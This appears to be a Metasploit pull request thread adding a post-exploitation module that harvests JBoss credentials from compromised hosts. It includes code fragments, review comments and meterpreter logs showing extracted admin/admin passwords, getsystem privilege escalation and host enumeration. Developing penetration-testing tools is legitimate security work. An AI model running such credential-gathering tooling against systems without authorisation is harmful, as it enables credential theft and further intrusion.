### PR TITLE
Added jboss_gather module.

### PR DESCRIPTION
**Pull request by Opperkip**
jboss_gather is a module that can extract usernames and passwords for jboss services on a linux or windows machine.

## Verification

List the steps needed to make sure this thing works

- [x] Have an existing meterpreter session
- [x] use post/multi/gather/jboss_gather
- [x] set session X
- [x] run
```
 Unix OS detected, attempting to locate Jboss services
   Found a Jboss installation version:4
  Bind file found: /home/reaper/jboss-4.2.3.GA/server/all/deploy/jboss-web.deployer/server.xml
  Bind file found: /home/reaper/jboss-4.2.3.GA/server/default/deploy/jboss-web.deployer/server.xml
  Username: admin Password: admin
  Username: admin Password: admin
  Post module execution completed
```

### CODE REVIEW

File: modules/post/multi/gather/jboss_gather.rb [hunk 1]
```diff
@@ -0,0 +1,267 @@
...
+                getpw(pwfiles,listenports)
+            end
+        else
+            print_status("No Jboss service has been found")
+        end
+    end
+
+    def run
+        if sysinfo['OS'].include? "Windows"
+          gatherwin()
```
Comment (brandonprry) [inline modules/post/multi/gather/jboss_gather.rb]: I think style guidelines say () shouldn't be there. Just call `gatherwin`

File: modules/post/multi/gather/jboss_gather.rb [hunk 2]
```diff
@@ -0,0 +1,267 @@
...
+        else
+          gathernix()
```
Comment (brandonprry) [inline modules/post/multi/gather/jboss_gather.rb]: nix the () and just `gathernix`

**Comment by h00die** [comment]
I'll try to take a look at this PR this week.

**Comment by h00die** [comment]
Started looking in to this, found nothing on my *nix box, but I most likely have it configured wrong or something.  I did start looking though

File: modules/post/multi/gather/jboss_gather.rb [hunk 3]
```diff
@@ -0,0 +1,317 @@
...
+    type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")
+    port = []
+
+    type1.each do |file1|
+      if file1 and file1.include? version
+        print_status("Attempting to extract Jboss service ports from: #{file1}")
+        begin
+          file1_read = read_file(file1).split("\n")
+        rescue
+          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
```
Comment (h00die) [inline modules/post/multi/gather/jboss_gather.rb]: believe this should be `file1` not `array`.

My run breaks here and throws a NameError undefined local variable or method `array` on this line.

File: modules/post/multi/gather/jboss_gather.rb [hunk 4]
```diff
@@ -0,0 +1,317 @@
...
+    end
+  end
+
+    type2.each do |file2|
+      if file2 and file2.include? version
+        print_status("Attempting to extract Jboss service ports from: #{file2}")
+        begin
+          xml2  = Nokogiri::XML(read_file(file2))
+        rescue
+          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
```
Comment (h00die) [inline modules/post/multi/gather/jboss_gather.rb]: This may need to be `file2` not `array`

File: modules/post/multi/gather/jboss_gather.rb [hunk 5]
```diff
@@ -0,0 +1,317 @@
...
+      create_credential_login(login_data)
+  end
+
+  def getpw(file, ports)
+    i = 0
+    file.each do |pwfile|
+      begin
+        lines = read_file(pwfile).split("\n")
+      rescue
+        print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
```
Comment (h00die) [inline modules/post/multi/gather/jboss_gather.rb]: Believe this needs to be `pwfile` not `array`

**Comment by Opperkip** [comment]
@h00die For Linux the module assumes the files can be found with the 'locate' command. If they cannot be found try updating your database with 'sudo updatedb'. Thx for looking at this btw.

**Comment by h00die** [comment]
While it works, i'm getting lots of errors thrown, and the `print_error` lines are only printing after the comma.
```
msf post(jboss_gather) > run

[*] Unix OS detected, attempting to locate Jboss services
[*] Found a Jboss installation version: 6
[*] Attempting to extract Jboss service ports from: /home/jboss/jboss-6.0.0.Final/server/all/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
: core_channel_open: Operation failed: 2ss-6.0.0.Final/server/all/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
, you probably don't have permissions to open the file.l/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
[*] Attempting to extract Jboss service ports from: /home/jboss/jboss-6.0.0.Final/server/default/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
: core_channel_open: Operation failed: 2ss-6.0.0.Final/server/default/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
, you probably don't have permissions to open the file.fault/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
[*] Attempting to extract Jboss service ports from: /home/jboss/jboss-6.0.0.Final/server/jbossweb-standalone/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
: core_channel_open: Operation failed: 2ss-6.0.0.Final/server/jbossweb-standalone/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
, you probably don't have permissions to open the file.ossweb-standalone/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
[*] Attempting to extract Jboss service ports from: /home/jboss/jboss-6.0.0.Final/server/minimal/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
: core_channel_open: Operation failed: 2ss-6.0.0.Final/server/minimal/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
, you probably don't have permissions to open the file.nimal/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
[*] Attempting to extract Jboss service ports from: /home/jboss/jboss-6.0.0.Final/server/standard/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
: core_channel_open: Operation failed: 2ss-6.0.0.Final/server/all/conf/props/jmx-console-users.properties
, you probably don't have permissions to open the file.l/conf/props/jmx-console-users.properties
: core_channel_open: Operation failed: 2ss-6.0.0.Final/server/default/conf/props/jmx-console-users.properties
, you probably don't have permissions to open the file.fault/conf/props/jmx-console-users.properties
: core_channel_open: Operation failed: 2ss-6.0.0.Final/server/jbossweb-standalone/conf/props/jmx-console-users.properties
, you probably don't have permissions to open the file.ossweb-standalone/conf/props/jmx-console-users.properties
[+] Credentials found - Username: admin Password: admin
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
msf post(jboss_gather) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter > shell
Process 4860 created.
Channel 25 created.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
jboss
$ uname -a
Linux jboss 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
```

**Comment by h00die** [comment]
i'm unsure if thats an issue with the module or not, may need to call in some assistance on that @brandonprry.

Meanwhile, i'm building my windows box to check

**Comment by h00die** [comment]
windows XP not working for me, i didn't install it as a service though.  I'm not interrupting the module, thats just what is displayed.
```
msf post(jboss_gather) > run

[*] Windows OS detected, enumerating services
[-] Post interrupted by the console user
[*] Post module execution completed
msf post(jboss_gather) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WINXP
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : GROUP
Logged On Users : 2
Meterpreter     : x86/windows

```

**Comment by h00die** [comment]
installed jboss as service, same result as above. wondering if theres an issue deeper thats bubbling up

**Comment by Opperkip** [comment]
@h00die I made some changes that should hopefully better indicate which files are accessible and used by the module on linux. As far as the read errors go could you confirm that you can read the listed files from the meterpreter with for example a cat command?

For Windows, it should be installed as a service before the module works. I never tested on XP though. Could you confirm you can use WMIC on your XP machine? That is basically the only problem I can think of.

**Comment by h00die** [comment]
WMIC is the culprate but its a strange issue.  From command line as a standard user on the box, your wmic command works great, i get output, i see jboss and java.exe.
When I drop to a shell from user level meterpreter and run the same command, it repeats the command, and seems to lock the shell up (not meterp in total).
When I escalate and try the same thing, same result.  @wvu-r7 do you know of any issues on why `wmic` wont give back output on winXP?

**Comment by h00die** [comment]
for my own notes:
```
msf post(jboss_gather) > run

[*] Windows OS detected, enumerating services
[-] Post interrupted by the console user
[*] Post module execution completed
msf post(jboss_gather) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3324 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>WMIC PROCESS get Caption,Commandline
WMIC PROCESS get Caption,Commandline

^C
Terminate channel 2? [y/N]  y
meterpreter > shell
Process 1456 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>wmic process get caption,commandline
wmic process get caption,commandline
^C
Terminate channel 3? [y/N]  y
meterpreter > getuid
Server username: WINXP\user
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3648 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>WMIC PROCESS get Caption,Commandline
WMIC PROCESS get Caption,Commandline
^C
Terminate channel 5? [y/N]  y
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3832 created.
Channel 7 created.
wMicrosoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>wmic
wmic



^C
Terminate channel 7? [y/N]  y
meterpreter > sysinfo
Computer        : WINXP
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : GROUP
Logged On Users : 2
Meterpreter     : x86/windows

```

**Comment by Opperkip** [comment]
@h00die Have you had time to test this on another system yet?

**Comment by h00die** [comment]
sorry, been busy lately.  I'll look at it in the next few days again

**Comment by h00die** [comment]
@brandonprry do you have time to test out the windows side?  I wont have time till the weekend, and no readily available windows box newer than XP.  I can land and do the rest, just need a windows tester

**Comment by h00die** [comment]
```
[*] Found a Jboss installation version: 6
[*] Attempting to extract Jboss service ports from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\all\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
[+] Jboss port found: 8080
[*] Attempting to extract Jboss service ports from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\default\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
[+] Jboss port found: 8080
[*] Attempting to extract Jboss service ports from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\jbossweb-standalone\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
[+] Jboss port found: 8080
[*] Attempting to extract Jboss service ports from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\minimal\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
[*] Attempting to extract Jboss service ports from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\standard\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
[+] Jboss port found: 8080
[*] Getting passwords from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\all\conf\props\jmx-console-users.properties
[+] Credentials found - Username: admin Password: admin
[!] No active DB -- Credential data will not be saved!
[*] Getting passwords from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\default\conf\props\jmx-console-users.properties
[+] Credentials found - Username: admin Password: admin
[*] Getting passwords from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\jbossweb-standalone\conf\props\jmx-console-users.properties
[+] Credentials found - Username: admin Password: admin
[*] Getting passwords from: C:\Users\jboss\Desktop\jboss-6.0.0.Final\server\standard\conf\props\jmx-console-users.properties
[+] Credentials found - Username: admin Password: admin
[*] Post module execution completed

```

Finally got it working on win10 x64, had to elevate to system, and service had to be started, but tehre we go!

**Comment by h00die** [comment]
# Release notes
This module adds a post exploitation module to gather configuration information, including credentials, from targets.

**Comment by h00die** [comment]
@Opperkip Thanks for hanging in there on this, took a while, but got it done!

**Comment by h00die** [comment]
2 things to note:
require msf/core is no longer required, so i took that out here: https://github.com/rapid7/metasploit-framework/commit/285857c23fa6356f602798ee1cf09216a37afbd1
module docs go in a documentation folder, so i moved there here: https://github.com/rapid7/metasploit-framework/commit/6fa51aee8fd82b4bea8dc2564adca4c3e8d0e6f6

**Pull request merged**